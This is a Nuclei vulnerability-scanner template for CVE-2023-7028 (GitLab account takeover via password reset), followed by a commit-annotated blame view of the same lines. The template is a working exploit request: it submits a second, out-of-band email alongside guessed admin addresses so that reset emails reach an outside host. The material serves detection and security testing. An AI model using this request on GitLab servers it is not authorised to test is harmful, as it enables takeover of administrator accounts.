nuclei-templates/http/cves/2023/CVE-2023-7028.yaml

id: CVE-2023-7028

info:
  name: GitLab - Account Takeover via Password Reset
  author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
  severity: critical
  description: |
    An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
  reference:
    - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
    - https://x.com/rwincey/status/1745659710089437368?s=20
    - https://gitlab.com/gitlab-org/gitlab/-/issues/436084
    - https://hackerone.com/reports/2293343
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 10
    cve-id: CVE-2023-7028
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 6
    vendor: gitlab
    product: gitlab
    shodan-query: title:"Gitlab"
  tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /users/password HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/users/password/new

        authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}

    payloads:
      username:
        - admin@example.com
        - admin@{{RDN}}
        - root@{{RDN}}
        - gitlab@{{RDN}}
        - git@{{RDN}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'smtp')

    extractors:
      - type: dsl
        dsl:
          - username
# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`id: CVE-2023-7028`

			`info:`
misc updates 2024-01-14 12:16:26 +00:00			`name: GitLab - Account Takeover via Password Reset`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch`
			`severity: critical`
			`description: \|`
			`An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.`
			`reference:`
			`- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/`
			`- https://x.com/rwincey/status/1745659710089437368?s=20`
misc updates 2024-01-14 12:16:26 +00:00			`- https://gitlab.com/gitlab-org/gitlab/-/issues/436084`
			`- https://hackerone.com/reports/2293343`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N`
			`cvss-score: 10`
			`cve-id: CVE-2023-7028`
			`cwe-id: CWE-284`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`max-request: 6`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`vendor: gitlab`
			`product: gitlab`
			`shodan-query: title:"Gitlab"`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00
flow: remove temporary workaround 2024-01-26 12:39:32 +00:00			`flow: http(1) && http(2)`
flow fix 2024-01-16 07:42:46 +00:00
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`http:`
			`- raw:`
			`- \|`
			`GET /users/sign_in HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: regex`
			`name: token`
			`group: 1`
			`regex:`
			`- name="authenticity_token" value="([A-Za-z0-9_-]+)"`
			`internal: true`

			`- raw:`
			`- \|`
misc updates 2024-01-14 12:16:26 +00:00			`@timeout: 20s`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00			`POST /users/password HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{RootURL}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Referer: {{RootURL}}/users/password/new`

misc updates 2024-01-14 12:16:26 +00:00			`authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00
			`payloads:`
			`username:`
misc updates 2024-01-14 12:16:26 +00:00			`- admin@example.com`
			`- admin@{{RDN}}`
			`- root@{{RDN}}`
			`- gitlab@{{RDN}}`
			`- git@{{RDN}}`
Create CVE-2023-7028.yaml 2024-01-14 07:28:32 +00:00
			`matchers:`
			`- type: dsl`
			`dsl:`
misc updates 2024-01-14 12:16:26 +00:00			`- contains(interactsh_protocol, 'smtp')`

			`extractors:`
			`- type: dsl`
			`dsl:`
			`- username`
Auto Template Signing [Fri Jan 26 14:12:01 UTC 2024] :robot: 2024-01-26 14:12:01 +00:00			`# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950`